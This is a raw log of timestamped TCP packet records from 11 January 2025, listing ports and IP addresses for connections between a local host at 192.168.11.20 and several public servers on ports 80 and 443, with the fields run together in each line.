                                                                                                                                                                  Jan 11, 2025 07:54:11.547123909 CET49763443192.168.11.2057.129.37.157
                                                                                                                                                                  Jan 11, 2025 07:54:11.698925018 CET49763443192.168.11.2057.129.37.157
                                                                                                                                                                  Jan 11, 2025 07:54:11.698949099 CET4434976357.129.37.157192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:12.154685020 CET4434976357.129.37.157192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:12.155436993 CET49763443192.168.11.2057.129.37.157
                                                                                                                                                                  Jan 11, 2025 07:54:12.155963898 CET49763443192.168.11.2057.129.37.157
                                                                                                                                                                  Jan 11, 2025 07:54:12.155980110 CET4434976357.129.37.157192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:12.156153917 CET4434976357.129.37.157192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:12.157007933 CET49763443192.168.11.2057.129.37.157
                                                                                                                                                                  Jan 11, 2025 07:54:12.339353085 CET49763443192.168.11.2057.129.37.157
                                                                                                                                                                  Jan 11, 2025 07:54:12.502202034 CET4976480192.168.11.2057.129.37.157
                                                                                                                                                                  Jan 11, 2025 07:54:12.730062008 CET804976457.129.37.157192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:12.730236053 CET4976480192.168.11.2057.129.37.157
                                                                                                                                                                  Jan 11, 2025 07:54:12.789820910 CET4976480192.168.11.2057.129.37.157
                                                                                                                                                                  Jan 11, 2025 07:54:12.820422888 CET4976580192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:54:13.017782927 CET804976457.129.37.157192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:13.019491911 CET804976457.129.37.157192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:13.019522905 CET804976457.129.37.157192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:13.019625902 CET4976480192.168.11.2057.129.37.157
                                                                                                                                                                  Jan 11, 2025 07:54:13.019710064 CET804976457.129.37.157192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:13.026098967 CET4976480192.168.11.2057.129.37.157
                                                                                                                                                                  Jan 11, 2025 07:54:13.042077065 CET8049765185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:13.042288065 CET4976580192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:54:13.042390108 CET4976580192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:54:13.255181074 CET804976457.129.37.157192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:13.255377054 CET804976457.129.37.157192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:13.255764008 CET4976480192.168.11.2057.129.37.157
                                                                                                                                                                  Jan 11, 2025 07:54:13.264193058 CET8049765185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:13.264702082 CET8049765185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:13.264826059 CET8049765185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:13.264935970 CET8049765185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:13.264967918 CET8049765185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:13.265153885 CET4976580192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:54:13.265153885 CET4976580192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:54:13.305018902 CET4976580192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:54:13.318856955 CET4976480192.168.11.2057.129.37.157
                                                                                                                                                                  Jan 11, 2025 07:54:13.526649952 CET8049765185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:13.526776075 CET4976580192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:54:13.588696957 CET804976457.129.37.157192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:13.601556063 CET804976457.129.37.157192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:13.648243904 CET4976480192.168.11.2057.129.37.157
                                                                                                                                                                  Jan 11, 2025 07:54:13.798063993 CET4976480192.168.11.2057.129.37.157
                                                                                                                                                                  Jan 11, 2025 07:54:14.026041985 CET804976457.129.37.157192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:14.026475906 CET4976480192.168.11.2057.129.37.157
                                                                                                                                                                  Jan 11, 2025 07:54:14.094108105 CET49766443192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:14.094130039 CET44349766160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:14.094301939 CET49766443192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:14.209774971 CET49766443192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:14.209788084 CET44349766160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:14.454071999 CET44349766160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:14.454879045 CET49766443192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:14.454879045 CET49766443192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:14.454893112 CET44349766160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:14.455025911 CET44349766160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:14.455383062 CET49766443192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:14.611514091 CET49766443192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:14.735419989 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:14.853837013 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:14.854504108 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:14.919289112 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:15.037715912 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:15.039568901 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:15.046508074 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:15.165843964 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:15.166032076 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:15.166687965 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:15.210036993 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:15.368995905 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:15.489640951 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:15.537861109 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:15.783618927 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:15.783618927 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:15.805115938 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:15.902168989 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:15.902182102 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:15.923543930 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:16.051769018 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:16.060169935 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:16.060468912 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:16.087112904 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:16.094135046 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:16.094409943 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:16.095338106 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:16.101617098 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:16.144349098 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:16.144943953 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:16.213725090 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:16.386044025 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:16.386056900 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:16.386203051 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:18.115514994 CET4976080192.168.11.2094.23.158.211
                                                                                                                                                                  Jan 11, 2025 07:54:21.052351952 CET4975380192.168.11.20172.217.0.163
                                                                                                                                                                  Jan 11, 2025 07:54:21.052366972 CET4975180192.168.11.20199.232.210.172
                                                                                                                                                                  Jan 11, 2025 07:54:21.170435905 CET8049751199.232.210.172192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:21.170445919 CET8049751199.232.210.172192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:21.170677900 CET4975180192.168.11.20199.232.210.172
                                                                                                                                                                  Jan 11, 2025 07:54:21.170737028 CET8049753172.217.0.163192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:21.170900106 CET4975380192.168.11.20172.217.0.163
                                                                                                                                                                  Jan 11, 2025 07:54:24.287962914 CET4976980192.168.11.2094.23.158.211
                                                                                                                                                                  Jan 11, 2025 07:54:25.301278114 CET4976980192.168.11.2094.23.158.211
                                                                                                                                                                  Jan 11, 2025 07:54:26.394881964 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:26.505059004 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:26.505357027 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:54:26.513231039 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:27.301014900 CET4976980192.168.11.2094.23.158.211
                                                                                                                                                                  Jan 11, 2025 07:54:28.387480021 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:28.387517929 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:28.387641907 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:28.387676001 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:28.387690067 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:28.387844086 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:28.391360044 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:28.391383886 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:28.391473055 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:28.391505003 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:28.768925905 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:28.769304037 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:28.769335032 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:28.771842957 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:28.772069931 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:28.774620056 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:28.775029898 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:28.775060892 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:28.778629065 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:28.778865099 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.177050114 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.177186966 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.177212000 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.177247047 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.177321911 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.177541971 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.227725983 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.227725983 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.227745056 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.227751970 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.273595095 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.273925066 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.328073025 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.328100920 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.328105927 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.328201056 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.328211069 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.328238964 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.328238964 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.328280926 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.328418970 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.328422070 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.328443050 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.328454971 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.328613043 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.328779936 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.328967094 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.328989983 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.329188108 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.329274893 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.329408884 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.383032084 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.445801973 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.445808887 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.446033955 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.446115017 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.446295977 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.446444988 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.446631908 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.446805000 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.447046995 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.447153091 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.447355032 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.447690964 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.447866917 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.447956085 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.447958946 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.447984934 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.448127031 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.448333025 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.448600054 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.448621035 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.448667049 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.448781967 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.448796988 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.448909044 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.448976994 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.449074984 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.449115992 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.449259043 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.449306965 CET50906443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.449328899 CET44350906204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.449842930 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.457371950 CET52413443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.457405090 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.457612038 CET52413443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.457776070 CET52413443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.457786083 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.490262032 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.691519022 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.691560984 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.691569090 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.691654921 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.691725016 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.691725016 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.691732883 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.691819906 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.691831112 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.691871881 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.691871881 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.692004919 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.692004919 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.809593916 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.809627056 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.809822083 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.809942007 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.809974909 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.810128927 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.810129881 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.810152054 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.810264111 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.810272932 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.810323954 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.810399055 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.810466051 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.810466051 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.810491085 CET44358637204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.810611963 CET58637443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.823599100 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.824225903 CET52413443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.824259043 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.825129032 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.825498104 CET52413443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.825633049 CET52413443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.825649977 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.825726986 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.877954006 CET52413443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:29.934251070 CET59765443192.168.11.203.167.152.61
                                                                                                                                                                  Jan 11, 2025 07:54:29.934295893 CET443597653.167.152.61192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.934456110 CET52865443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:29.934488058 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:29.934494019 CET4435286523.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.934523106 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.934587002 CET61052443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:29.934604883 CET52161443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:29.934609890 CET4436105223.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.934652090 CET4435216123.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.934845924 CET52865443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:29.934879065 CET52161443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:29.934916973 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:29.934916973 CET59765443192.168.11.203.167.152.61
                                                                                                                                                                  Jan 11, 2025 07:54:29.934926033 CET61052443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:29.935108900 CET59765443192.168.11.203.167.152.61
                                                                                                                                                                  Jan 11, 2025 07:54:29.935147047 CET443597653.167.152.61192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.935209990 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:29.935225010 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.935339928 CET52161443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:29.935357094 CET4435216123.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.935388088 CET52865443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:29.935403109 CET4435286523.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:29.935468912 CET61052443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:29.935488939 CET4436105223.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.056236982 CET51731443192.168.11.2020.125.209.212
                                                                                                                                                                  Jan 11, 2025 07:54:30.056252956 CET4435173120.125.209.212192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.056443930 CET51731443192.168.11.2020.125.209.212
                                                                                                                                                                  Jan 11, 2025 07:54:30.056546926 CET51731443192.168.11.2020.125.209.212
                                                                                                                                                                  Jan 11, 2025 07:54:30.056552887 CET4435173120.125.209.212192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.056848049 CET52371443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:30.056873083 CET4435237123.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.057046890 CET52371443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:30.057152033 CET52371443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:30.057168961 CET4435237123.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.057235003 CET61267443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:30.057260990 CET44361267204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.057367086 CET61267443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:30.057502985 CET61267443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:30.057518005 CET44361267204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.063965082 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.064001083 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.064007044 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.064110994 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.064192057 CET52413443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:30.064204931 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.064213037 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.064223051 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.064265013 CET52413443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:30.064379930 CET52413443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:30.064423084 CET52413443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:30.181570053 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.181679010 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.181725979 CET52413443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:30.181802988 CET52413443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:30.182037115 CET52413443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:30.182156086 CET52413443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:30.182172060 CET44352413204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.187912941 CET4435286523.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.188030005 CET4435216123.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:30.188195944 CET52865443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:30.188220024 CET4435286523.45.46.202192.168.11.20
